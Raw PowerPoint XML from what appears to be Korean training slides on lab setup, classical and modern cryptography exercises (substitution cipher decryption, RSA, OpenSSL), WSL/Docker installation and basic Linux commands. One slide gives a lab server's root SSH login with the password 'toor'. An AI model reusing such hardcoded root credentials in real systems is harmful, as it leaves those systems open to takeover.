                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>목  차</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="화살표: 오른쪽 12">
              <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C927F5CE-A493-4E1A-949D-C9BADB4A6F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="11268188" y="149065"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 7314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5"/>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6"/>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7"/>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8"/>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9"/>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10"/>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10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # ssh root@10.10.1.166</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1073139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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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43795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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31612540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7517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3604498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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호실습</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164892736"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3089260" y="2678454"/>
          <a:ext cx="6013480" cy="2216785"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="446310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="860354">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2643554">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="266476251"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031631">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031631">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="36677930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사용도구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615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8478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9475649"/>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치환 암호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6985399"/>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현대암호 구현 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– RSA</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30849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소프트웨어</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실습</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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실습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대칭키</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암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실습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대칭키</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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실습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공개키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암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실습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공개키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Openssl</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41499537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/Training/Cipher/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:b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key=3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5554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/Training/Cipher/1</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9436917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“cipher.txt”, “decryption.py”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“cipher.txt”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“decryption.py.py”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“decryption.py.py”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decryption.py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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="668778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dirty="0" err="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628934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with liberation, the Naval Academy was opened to foster elite naval officers who will protect the seas of the motherland by Admiral Son Won-il and other marine pioneers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland, and are still striving to raise the status of Korea in all parts of the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Like the adage that those who rule the sea dominate the world, we will meet the expectations of the nation and the people by nurturing talented people who protect the sea, which is our place of living and the channel of national prosperity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>We look forward to your continued interest and support for our Naval Academy.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142300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/Training/Cipher/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:b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7" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211C265B-4B92-46DA-A10F-F09FDDCA994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676267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/Training/Cipher/2</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E3AECEE3-C321-44DD-A870-D626B7F77FB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69932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“cipher.txt”, “decryption.py”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“cipher.txt”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“decryption.py.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>기초 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pyEnchant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</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“decryption.py.py”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decryption.py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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11651296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After receiving an order from the Senate to dismantle all of the corps in Gaul and appear in Rome, he led the corps to cross the Rubicon River. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>At the time, the Rubicon River was the border between Rome and the provinces, and it was not allowed to cross the river with troops. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Caesar said his dice were thrown as he crossed this river.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931593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27442263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6148633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2755841180"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1325564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4532244">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file"/>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65058">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38877580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3514888310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2067339" y="2014453"/>
          <a:ext cx="8213698" cy="3275070"/>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gridCol w="747423">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3549310020"/>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지식</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유머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전쟁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유머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지식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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4300036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1069073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dirty="0"/>
              <a:t>“store” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 검색한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Strore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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“windows terminal”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8179903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80C7EC-4675-437A-81A0-1A0D6E97021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681754A-2693-4C28-A299-E5432694E657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>󰏮</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22885459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155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featurename:Microsoft-Windows-Subsystem-Linux</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featurename:VirtualMachinePlatform</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may take a few minutes…”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71189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dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“exit”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dirty="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87871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–set-version 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76640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/Environ/Docker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>“store” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 검색한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Strore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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35378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dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330682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08985740"/>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1839971550"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4675952"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Race 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93486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84855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57521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22943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45532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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052096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512755652"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4677792"/>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grep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echo</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head/tail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shutdown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1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24737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6743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89202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home]# cd /export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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>err.log  err_url.txt  home  repo</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2014 err.log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2014 err_url.txt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2017 home</a:t>
              </a:r>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20:17 repo</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-a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  ..  err.log  err_url.txt  home  repo</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2014 err.log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2014 err_url.txt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–h  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: K(kilo), M(mega),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dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>atime</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>접근 시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>read.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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–lc  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>ctime</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(</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–al e*.g  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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export]# ls  &gt; file.txt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69630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7782743"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464688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1511023"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2458383"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1415400"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2598342"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3273183"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2230200"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3413142"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3774146"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2738301"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3914105"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070777"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027794"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210736"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045865"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002882"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185824"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012923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/test</a:t>
              </a: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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p /test1/test2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/test1/test2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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</a:t>
              </a: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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p /test1/test2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/test1/test2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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</a:t>
              </a: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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m 775 test3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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m 777 test4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15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3</a:t>
              </a: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15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a: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59306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/test1/test2</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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touch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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touch -t 202106141200 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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14  2021 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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test4</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touch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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14  2021 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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test4</a:t>
              </a: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touch -r </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>oldfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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test4</a:t>
              </a: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94562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 -l &gt; file1</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cat file1</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15:25 file1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14  2021 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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test4</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 -al &gt; file2</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cat file1 file2</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15:25 file1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14  2021 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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test4</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cat -n file1</a:t>
              </a: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15:25 file1</a:t>
              </a:r>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14  2021 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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15:08 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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test3</a:t>
              </a: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15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a: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cat &gt; file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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cat file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>test file...</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8434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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>file2  file3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>oldfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
